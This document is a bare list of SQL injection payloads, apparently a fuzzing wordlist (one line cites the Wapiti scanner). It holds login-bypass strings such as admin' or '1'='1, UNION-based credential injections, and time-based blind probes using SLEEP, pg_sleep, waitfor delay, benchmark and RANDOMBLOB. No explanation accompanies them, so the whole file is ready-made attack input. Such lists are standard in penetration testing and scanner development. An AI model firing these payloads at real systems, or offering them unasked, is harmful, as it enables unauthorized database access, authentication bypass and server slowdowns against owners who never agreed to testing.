OR 1=1
"
" "
" OR "" = "
" OR 1 = 1 -- -
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""^"
" or "x"="x
" or benchmark(10000000,MD5(1))#
" or pg_sleep(5)--
" or sleep(5)#
" or sleep(5)="
" or true--
""
"&"
") or ("x")=("x
") or benchmark(10000000,MD5(1))#
") or pg_sleep(5)--
") or sleep(5)="
") or true--
")) or (("x"))=(("x
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(5)--
")) or sleep(5)="
"));waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
"*"
"-"
";waitfor delay '0:0:5'--
"^"
# from wapiti
%00
&&SLEEP(5)
&&SLEEP(5)#
&&SLEEP(5)--
'
' '
' AND id IS NULL; --
' AnD SLEEP(5) ANd '1
' OR '' = '
' OR '1
' OR 'x'='x
' OR 1 -- -
' or "
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''^'
' or 'x'='x
' or benchmark(10000000,MD5(1))#
' or pg_sleep(5)--
' or sleep(5)#
' or sleep(5)='
' or true--
'&&SLEEP(5)&&'1
'&'
''
'''''''''''''UNION SELECT '2
') or ('x')=('x
') or benchmark(10000000,MD5(1))#
') or pg_sleep(5)--
') or sleep(5)='
') or true--
')) or (('x'))=(('x
')) or benchmark(10000000,MD5(1))#
')) or pg_sleep(5)--
')) or sleep(5)='
'));waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
'*'
'-'
';waitfor delay '0:0:5'--
'='
'=0--+
'LIKE'
'\"
'^'
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
));waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
+ SLEEP(10) + '
+benchmark(3200,SHA1(1))+'
,
-- or # 
---------------------------------------------------------------------------
/
/*…*/
//
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(5)--
1 or sleep(5)#
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(5)--
1) or sleep(5)#
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(5)--
1)) or sleep(5)#
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
;
;waitfor delay '0:0:5'--
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
AnD SLEEP(5)
AnD SLEEP(5)#
AnD SLEEP(5)--
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)#
ORDER BY SLEEP(5)--
RANDOMBLOB(1000000000/2)
RANDOMBLOB(500000000/2)
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
\
\\
`
``
admin" #
admin" --
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin'/*
admin'or 1=1 or ''='
benchmark(10000000,MD5(1))#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))#
benchmark(50000000,MD5(1))--
or 1=1
or 1=1#
or 1=1--
or 1=1/*
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))--
or pg_SLEEP(5)
or pg_SLEEP(5)#
or pg_SLEEP(5)--
or true--
pg_SLEEP(5)
pg_SLEEP(5)#
pg_SLEEP(5)--
pg_sleep(5)--
sleep(5)#
waitfor delay '00:00:05'
waitfor delay '00:00:05'#
waitfor delay '00:00:05'--